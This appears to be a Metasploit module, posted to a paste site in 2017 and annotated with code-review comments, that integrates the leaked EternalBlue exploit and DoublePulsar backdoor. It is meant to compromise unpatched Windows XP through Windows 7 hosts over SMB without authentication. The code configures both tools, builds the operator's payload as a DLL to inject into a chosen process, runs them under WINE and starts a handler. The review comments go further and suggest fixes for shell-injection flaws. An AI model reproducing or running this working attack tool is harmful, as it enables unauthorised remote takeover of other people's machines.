FluxTheGreat

eternalblue_doublepulsar.rb

Aug 5th, 2017
  1. require 'msf/core'
  2.  
# Thin Metasploit wrapper around two pre-built external Windows binaries that
# are executed under WINE ("Eternalblue-2.2.0.exe" and "Doublepulsar-1.3.1.exe").
# Everything this file does itself is plumbing:
#   1. fill placeholder tokens in the two tools' XML templates via `cp`/`sed`,
#   2. generate the operator-selected payload as a DLL and write it under WINEPATH,
#   3. run each binary from its directory and look for a success marker in stdout,
#   4. start the framework's payload handler.
# None of the SMB protocol logic lives here; it is entirely inside the external
# binaries, which is what the "NOT THE FULL PORTATION" line in the description means.
#
# Review notes (code quality on the host running the module):
#   * Every shell command is built by interpolating datastore values directly into
#     backticks with no quoting or escaping (see `exploit`). A value containing
#     shell metacharacters is executed by the local shell. `Shellwords.escape` or
#     an argv-array `system` call would remove that.
#   * The exit status of `cp`, `sed` and `wine` is never checked and the command
#     results are assigned to locals (`cp`, `sed`) that are never read, so a
#     missing template or failed substitution silently falls through.
#   * Success is judged purely by substring matches on the tools' stdout.
#   * All default paths are absolute paths under /root and assume one specific
#     directory layout and WINE prefix.
class MetasploitModule < Msf::Exploit::Remote

  #include Msf::Exploit::Remote::DCERPC
  # NOTE(review): no SMB client call is made in this file; the mixin is presumably
  # included only for the RHOST/RPORT options read in `exploit` — confirm.
  include Msf::Exploit::Remote::SMB::Client

  # Registers module metadata, the target table and the operator options.
  #
  # @param info [Hash] metadata merged by Metasploit's `update_info`
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'EternalBlue',
      'Description' => %q{
          This module exploits a vulnerability on SMBv1/SMBv2 protocols through Eternalblue.
      After that, doublepulsar is used to inject remotely a malicious dll (it's will generate based on your       payload selection).
     You can use this module to compromise a host remotely (among the targets available) without needing         nor authentication neither target's user interaction.
      ** THIS IS AN INTEGRATION OF THE ORIGINAL EXPLOIT, IT'S NOT THE FULL PORTATION **
    },
    'Author'      =>
      [
        'Pablo Gonzalez (@pablogonzalezpe)',
        'Sheila A. Berta (@UnaPibaGeek)'
      ],
       'Payload'        =>
      {
        'BadChars'   => "\x00\x0a\x0d",
      },
    'Platform'       => 'win',
    # Index 8 below ("Windows 7 ...") is the default entry.
    'DefaultTarget'  => 8,
    # The per-target hashes are all empty: `exploit` only uses the target *name*
    # (a regex on it selects the XML profile), nothing else is target-specific here.
    'Targets'        =>
      [
     ['Windows XP (all services pack) (x86) (x64)',{}],
     ['Windows Server 2003 SP0 (x86)',{}],
     ['Windows Server 2003 SP1/SP2 (x86)',{}],
     ['Windows Server 2003 (x64)',{}],
        ['Windows Vista (x86)',{}],
     ['Windows Vista (x64)',{}],
     ['Windows Server 2008 (x86) ',{}],
     ['Windows Server 2008 R2 (x86) (x64)',{}],
     ['Windows 7 (all services pack) (x86) (x64)',{}]
   ],
    'Arch'           => [ARCH_X86,ARCH_X64],
     'ExitFunc'       => 'thread',
     # NOTE(review): 'Target' is not read anywhere in this file; 'DefaultTarget'
     # above is what selects the entry. Presumably a leftover — verify against
     # what `update_info` accepts.
     'Target'         => 0,
    'License'     => MSF_LICENSE,
       )

       )

   # Operator-facing options. Every one of these is later interpolated into a
   # shell command or a file path without escaping (see `exploit`).
   register_options([
       OptEnum.new('TARGETARCHITECTURE', [true,'Target Architecture','x86',['x86','x64']]),
       OptString.new('ETERNALBLUEPATH',[true,'Path directory of Eternalblue','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
       OptString.new('DOUBLEPULSARPATH',[true,'Path directory of Doublepulsar','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
       # WINEPATH is concatenated with DLLName using plain `+`, so it must end in '/'
       # (the default does).
       OptString.new('WINEPATH',[true,'WINE drive_c path','/root/.wine/drive_c/']),
       OptString.new('PROCESSINJECT',[true,'Name of process to inject into (Change to lsass.exe for x64)','wlms.exe'])
   ], self.class)

register_advanced_options([
  # Read back in `exploit` as datastore['TIMEOUT']; Metasploit datastore keys are
  # case-insensitive, so the mixed-case name presumably resolves — confirm.
  OptInt.new('TimeOut',[false,'Timeout for blocking network calls (in seconds)',60]),
  OptString.new('DLLName',[true,'DLL name for Doublepulsar','eternal11.dll'])
], self.class)

end

# Main entry point invoked by the framework.
#
# Steps, in order: rewrite the Eternalblue XML template, rewrite the Doublepulsar
# XML template, generate and write the payload DLL, run both binaries under WINE,
# then hand over to `handler`. No step checks the previous one succeeded; each
# later step runs regardless of earlier command exit status.
def exploit

#Custom XML Eternalblue
print_status('Generating Eternalblue XML data')
# Copy the skeleton to the working XML name, then substitute placeholders in
# place. The return value (stdout of `cp`) is captured into `cp` but never used,
# and `$?` is not inspected, so a missing skeleton is not detected here.
cp = `cp #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.Skeleton.xml #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
# Each `sed -i 's/%TOKEN%/value/'` replaces the first occurrence per line. The
# value is interpolated unescaped: a '/' or '&' in it would break or alter the
# sed expression, and shell metacharacters would reach the shell.
sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
  sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
  sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`

  # Pick the XML target profile from the selected target's *name*. This is a
  # substring match: any name containing "7", "2008" or "Vista" maps to
  # "WIN72K8R2" (indices 4-8 of 'Targets'); the XP and 2003 entries (indices 0-3)
  # contain none of those and fall through to "XP".
  if target.name =~ /7|2008|Vista/
    objective = "WIN72K8R2"
  else
    objective = "XP"
  end

  sed = `sed -i 's/%TARGET%/#{objective}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`

  #Custom XML Doublepulsar
  # Same copy-then-substitute pattern as above, with the same unchecked exit
  # status and unescaped interpolation.
  print_status('Generating Doublepulsar XML data')
  cp = `cp #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.Skeleton.xml #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  sed = `sed -i 's/%TARGETARCHITECTURE%/#{datastore['TARGETARCHITECTURE']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  # Plain string concatenation: no path separator is inserted, so WINEPATH must
  # already end in '/'.
  dllpayload = datastore['WINEPATH'] + datastore['DLLName']
  # Escape every '/' as '\/' so the path survives inside the sed `s/.../.../`
  # expression below. This is the only interpolated value that gets any escaping.
  dllpayload2 = dllpayload.gsub('/','\/')
  sed = `sed -i 's/%DLLPAY%/#{dllpayload2}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
  sed = `sed -i 's/%PROCESSINJECT%/#{datastore['PROCESSINJECT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`

  #Generate DLL
  # Instantiate the operator-selected payload module, copy LHOST across, and
  # render it in DLL format. Only LHOST is forwarded to the payload's datastore.
  print_status("Generating payload DLL for Doublepulsar")
  pay = framework.modules.create(datastore['payload'])
  pay.datastore['LHOST'] = datastore['LHOST']
  dll = pay.generate_simple({'Format'=>'dll'})
  # Write the DLL to the same path that was substituted for %DLLPAY% above
  # (`dllpayload`, rebuilt here by hand). The block form closes the file even if
  # `print` raises.
  File.open(datastore['WINEPATH']+datastore['DLLName'],'w') do |f|
    print_status("Writing DLL in #{dllpayload}")
    f.print dll
  end

  #Send Exploit + Payload Injection
  print_status('Launching Eternalblue...')
  # Backticks spawn a shell, so the `cd` only affects that child; the module's
  # own working directory is unchanged. Only stdout is captured (stderr is not),
  # and the exit status is ignored — success is decided by the markers below.
  output = `cd #{datastore['ETERNALBLUEPATH']}; wine Eternalblue-2.2.0.exe`
  if output =~ /=-=-WIN-=-=/
    print_good("Pwned! Eternalblue success!")
  elsif output =~ /Backdoor returned code: 10 - Success!/
    print_good("Backdoor is already installed")
  else
    # Reported but not fatal: execution continues to the second binary anyway.
    print_error("Are you sure it's vulnerable?")
  end
  print_status('Launching Doublepulsar...')
  output2 = `cd #{datastore['DOUBLEPULSARPATH']}; wine Doublepulsar-1.3.1.exe`
  if output2 =~ /Backdoor returned code: 10 - Success!/
    print_good("Remote code executed... 3... 2... 1...")
  else
    print_error("Oops, something was wrong!")
  end  

  # Inherited framework method: starts the payload handler. Called unconditionally,
  # even when both output checks above reported failure.
  handler

 end

end